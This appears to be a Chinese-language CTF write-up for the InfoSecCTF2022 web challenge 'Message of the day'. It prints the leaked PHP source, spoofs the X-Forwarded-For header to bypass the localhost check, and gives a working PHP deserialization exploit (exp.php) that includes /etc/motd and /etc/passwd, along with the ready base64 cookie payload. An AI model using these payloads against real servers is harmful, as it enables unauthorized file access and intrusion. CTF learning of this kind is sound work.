WEB-InfoSecCTF2022-Message of the day

Message of the Day

1
2
題目首頁顯示 You are not allowed to access.
先用dirsearch爆破目錄

1
2
發現backup.zip
裡面有三個檔案 client.php read.php index.php

  • index.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    <?php

    	include('client.php');

    	function getIP()
    	{
    	    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    	    {
    	      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    	    }
    	    else
    	    {
    	      $ip=$_SERVER['REMOTE_ADDR'];
    	    }
    	    return $ip;
    	}

    	if (getIP() == '127.0.0.1') {
    		if (!isset($_COOKIE['client'])) {
    			setcookie("client", base64_encode(serialize(new Client('Guest'))));
    		} else {
    			unserialize(base64_decode($_COOKIE['client']));
    		}
    	}
    	else {
    		header('HTTP/1.0 403 Forbidden');
        	die('You are not allowed to access.');
    	}
    ?>

  • read.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    <?php
    	class Read {
    		
    		// Still in development phase

    		private $file_name;

    		public function print($val) {
    			include($this->file_name);
    			echo $val;
    		}
    	}
    ?>

  • client.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    <?php
    	include('read.php');

    	class Client {

    		private $name;
    		private $tmp;

    		function __construct($name) {
    			$this->name = $name;
    			$this->tmp = new Message();
    		}

    		function __destruct() {
    			$this->tmp->print($this->name);
    		}
    	}

    	class Message {

    		public function print($val) {
    			echo "Tigers and bears may be stronger predators, but wolves don't perform in circus, ". $val ."!";
    		}

    	}

    ?>
1
2
3
4
5
6
7
8
9
10
拿到三個文件的source code
首先會利用$_SERVER['HTTP_X_FORWARDED_FOR'] 抓取使用者
使用者可控的header都不安全
可用X-Forwarded-For: 127.0.0.1 繞過

接著會對cookie裡面的內容做反序列化
unserialize(base64_decode($_COOKIE['client']));

會call Message的Print function
可改成readprint 並將file_name改成要include的檔案

  • exp.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    <?php

    class Read {
    		
        private $file_name = '/etc/motd';

        public function print($val) {
            include($this->file_name);
            echo $val;
        }
    }

    class Client {

        private $name;
        private $tmp;

        function __construct($name) {
            $this->name = $name;
            $this->tmp = new Read();
        }

        function __destruct() {
            $this->tmp->print($this->name);
        }

    }

    class Message {

        public function print($val) {
            echo "Tigers and bears may be stronger predators, but wolves don't perform in circus, ". $val ."!";
        }

    }

    $test = new Client('/etc/passwd');

    $y = base64_encode(serialize($test));
    echo $y;

    ?>

  • requests get flag

    1
    2
    3
    4
    根據題意 推測為motd指令 將payload file_name給/etc/motd
    Cookie: client=Tzo2OiJDbGllbnQiOjI6e3M6MTI6IgBDbGllbnQAbmFtZSI7czoxMToiL2V0Yy9wYXNzd2QiO3M6MTE6IgBDbGllbnQAdG1wIjtPOjQ6IlJlYWQiOjE6e3M6MTU6IgBSZWFkAGZpbGVfbmFtZSI7czo5OiIvZXRjL21vdGQiO319

    X-Forwarded-For: 127.0.0.1

CTF > WEB
#CTF #PHP #反序列化
WEB-InfoSecCTF2022-Message of the day
https://0xbe61a55f.github.io/2022/12/04/WEB-InfoSecCTF2022-Message of the day/
作者
Giwawa
發布於
2022年12月4日
許可協議